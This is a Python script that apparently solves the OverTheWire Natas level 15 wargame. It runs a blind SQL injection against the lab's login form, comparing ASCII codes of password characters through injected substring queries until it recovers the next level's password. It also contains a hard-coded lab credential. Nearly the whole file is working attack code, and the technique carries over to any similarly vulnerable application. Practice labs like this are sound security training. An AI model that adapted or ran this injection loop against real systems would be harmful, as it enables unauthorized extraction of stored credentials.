#! python3
#########################
# ASCII TABLE
# '0' -> 48, '9' -> 57
# 'A' -> 65, 'Z' -> 90
# 'a' -> 97, 'z' -> 122
#########################
#############################
# Imports
# os and sys are imported but not referenced anywhere in the visible script.
import os
import sys
import requests
import re
#############################
# Global Variables
# Characters recovered so far; the main section appends one per position.
bruteforced_password=""
# Intended password length.  The main loop's while-condition hard-codes 32
# instead of reading this variable.
password_length=32
# 1-based position handed to substring() by set_http_string; advanced by the main loop.
current_password_character_index=1
# Not referenced anywhere in the visible script.
password_character_iterate=''
# 1 -> 0 to 9, 2 -> A to Z, 3 -> a to z
current_range=1
# Result Strings
# Server messages that re.search() looks for in every response.  Three
# distinguishable texts (true / false / query error) are what make the injected
# comparison readable as an oracle; the server-side mitigation is a
# parameterized query plus one uniform response regardless of outcome.
# They are used as regex patterns, so the '.' in each matches any character.
result_string_true="This user exists."
result_string_false="This user doesn't exist."
result_string_error="Error in query."
# Placeholders overwritten later: http_session becomes a requests.Session()
# in the main section, the other three are rewritten by every probe.
http_session=""
http_sql_injection_username_parameter_string=""
http_request=""
http_response=""
#############################
# Functions
# Function to set http string
def set_http_string(mode, character):
    """Rebuild the ``username`` value used by the next probe.

    ``mode`` selects the comparison operator: 1 -> ``=``, 2 -> ``>=``, any
    other value -> ``<=``.  The probe compares the ASCII code of the password
    character at ``current_password_character_index`` with ``ord(character)``.
    The string is written to the module-level
    ``http_sql_injection_username_parameter_string``; nothing is returned.
    """
    global http_sql_injection_username_parameter_string
    # Mode 1 -> Equal, Mode 2 -> More or Equal, Mode 3 -> Less or Equal
    operators = {1: '=', 2: '>='}
    comparison = operators.get(mode, '<=')
    prefix = 'natas16\" and ascii(substring((SELECT password from users where username=\"natas16\"),'
    suffix = ' and password like \"%'
    http_sql_injection_username_parameter_string = (
        prefix
        + str(current_password_character_index)
        + ',1))'
        + comparison
        + str(ord(character))
        + suffix
    )
# Function to Get Range
# Return 1 for 0-9, 2 for A-Z, 3 for a-z, 4 for error
def Get_Range():
    """Determine the character class of the current password position.

    Sends up to three ``<=`` probes in order ('9', 'Z', 'z'); the first one the
    server confirms decides the class.  Returns 1 for 0-9, 2 for A-Z, 3 for
    a-z, 4 as soon as the server reports a query error, and 0 if no probe
    matched.  Each probe overwrites the module-level ``http_request`` and
    ``http_response``.  The ordering assumes the character is alphanumeric.
    """
    global http_sql_injection_username_parameter_string
    global http_request
    global http_response
    upper_bounds = ('9', 'Z', 'z')
    for range_id, bound in enumerate(upper_bounds, start=1):
        set_http_string(3, bound)
        http_request = http_session.post(
            'http://natas15.natas.labs.overthewire.org/index.php',
            data = {'username' : http_sql_injection_username_parameter_string},
        )
        http_response = str(http_request.text)
        if re.search(result_string_true ,http_response):
            return range_id
        if re.search(result_string_error,http_response):
            return 4
    return 0
# Function to Brute Force Password
def BruteForcePassword(BruteForcePassword_password_range):
    """Probe every character of the given class for the current position.

    ``BruteForcePassword_password_range`` is 1 for 0-9, 2 for A-Z, 3 for a-z.
    Every character of the class is checked through ``Check_HTTP_Character``
    (the loop does not stop early); the last one reported as correct is
    returned.  Returns ``''`` for an unknown class or when nothing matched.
    """
    class_bounds = {1: ('0', '9'), 2: ('A', 'Z'), 3: ('a', 'z')}
    found = ''
    if BruteForcePassword_password_range in class_bounds:
        first, last = class_bounds[BruteForcePassword_password_range]
        for code in range(ord(first), ord(last) + 1):
            candidate = chr(code)
            if Check_HTTP_Character(candidate) == 0:
                found = candidate
    return found
# Function to Check HTTP Character
# [Returns] 0 -> Correct Character, 1 -> False Character, 2 -> Error in SQL Query
def Check_HTTP_Character(Check_HTTP_Character_character):
    """Ask the server whether the current position equals the given character.

    Sends one ``=`` probe and inspects the response text: returns 0 when the
    server confirms the character and 1 when it rejects it.  Any other
    response prints 'Error in SQL Query...' and terminates the script, so the
    return value 2 named in the comment above is never actually produced.
    Overwrites the module-level ``http_request`` and ``http_response``.
    """
    global http_sql_injection_username_parameter_string
    global http_request
    global http_response
    set_http_string(1, Check_HTTP_Character_character)
    http_request = http_session.post(
        'http://natas15.natas.labs.overthewire.org/index.php',
        data = {'username' : http_sql_injection_username_parameter_string},
    )
    http_response = str(http_request.text)
    if re.search(result_string_true,http_response):
        return 0
    if re.search(result_string_false ,http_response):
        return 1
    print ('Error in SQL Query...')
    exit()
###############################
# Main Function
# One authenticated session is reused for every probe.
http_session = requests.Session()
http_session.auth=('natas15','AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
# Recover the password one position at a time; 32 is hard-coded here rather
# than taken from password_length.
while current_password_character_index <= 32:
    # Get_Range: 0 -> unexpected, 1 -> 0-9, 2 -> A-Z, 3 -> a-z, 4 -> error in sql query
    current_range = Get_Range()
    if current_range == 0:
        print ('Program should not return this...')
        break
    if current_range in (1, 2, 3):
        Password_Character = BruteForcePassword(current_range)
        bruteforced_password += Password_Character
    elif current_range == 4:
        print ('Error in SQL Query')
        break
    print (f'Loop Count: {current_password_character_index}')
    print (f'Current Brute Forced Password: {bruteforced_password}')
    current_password_character_index += 1
print (f'Password for natas16 is {bruteforced_password}')